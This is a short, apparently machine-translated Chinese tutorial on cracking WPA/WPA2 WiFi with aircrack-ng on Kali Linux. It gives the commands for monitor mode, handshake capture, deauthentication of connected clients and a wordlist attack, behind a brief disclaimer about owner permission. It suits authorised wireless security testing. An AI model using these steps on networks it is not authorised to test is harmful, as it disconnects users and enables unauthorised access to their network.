如何使用 Kali Linux 破解 WPA/WPA2 WiFi？

“Hacking Wifi”听起来很酷很有趣。但实际上，使用一个好的词表来破解 wifi 实际上要容易得多。但是这个世界列表在我们不知道如何实际使用该单词列表来破解哈希之前是没有用的。在破解哈希之前，我们实际上需要生成它。因此，以下是破解 WPA/WPA2 wifi 的步骤以及一些好的词表。

注意：以下方法仅用于您自己的 wifi 上的教育/测试目的或经所有者许可。不要将其用于恶意目的。

所以，启动Kali Linux 。打开终端窗口。并执行以下步骤。

第 1 步： ifconfig(interface configuration)：查看或更改系统上网络接口的配置。

ifconfig

这里，

• eth0 : 第一个以太网接口
• l0 : 环回接口
• wlan0 ：系统上的第一个无线网络接口。 （这就是我们需要的。 ）

第 2 步：停止当前正在使用WiFi接口的进程。

airmon-ng check kill

第 3 步：在监控模式下启动 wlan0。

airmon-ng start wlan0

第 4 步：查看您周围的所有 Wifi 网络。

airodump-ng wlan0mon

这里，

• airodump-ng : 用于数据包捕获
• wlan0mon : 接口名称（这个名称在不同设备上可以不同）

找到目标网络后，按Ctrl+C 停止该过程。

步骤 5：查看连接到目标网络的客户端。

airodump-ng -c 1 --bssid 80:35:C1:13:C1:2C -w /root wlan0mon

这里，

• airodump-ng : 用于数据包捕获
• -c : 频道
• –bssid : 无线接入点 ( WAP ) 的 MAC 地址。
• -w ：要保存文件的目录（密码文件）。
• wlan0mon ：接口的名称。

步骤 6：打开一个新的终端窗口以断开连接到目标网络的客户端。

aireplay-ng -0 10 -a 80:35:C1:13:C1:2C wlan0mon

• aireplay-ng : 注入帧
• -0 : 用于解除认证
• 10 : 要发送的解除认证数据包的数量
• -a : 目标网络的bssid
• wlan0mon ：接口的名称。

当客户端与目标网络断开连接时。他尝试重新连接到网络，当他这样做时，您将在终端的前一个窗口中看到称为 WPA 握手的内容。

现在，我们完成了对数据包的捕获。所以，现在您可以关闭终端窗口。

步骤 7.解密密码。打开文件应用程序。

这里，

• hacking-01.cap是你需要的文件。

  aircrack-ng -a2 -b 80:35:C1:13:C1:2C -w /root/passwords.txt /root/hacking-01.cap

• aircrack-ng : 802.11 WEP和WPA-PSK密钥破解程序
• -a : -a2 用于WPA2 & -a 用于WPA网络
• -b : 目标网络的 BSSID
• -w : 词表文件的位置
• /root/hacking-01.cap : cap 文件的位置

您可以从互联网上下载常用密码文件，如果您想创建自己的文件，则可以使用 crunch 工具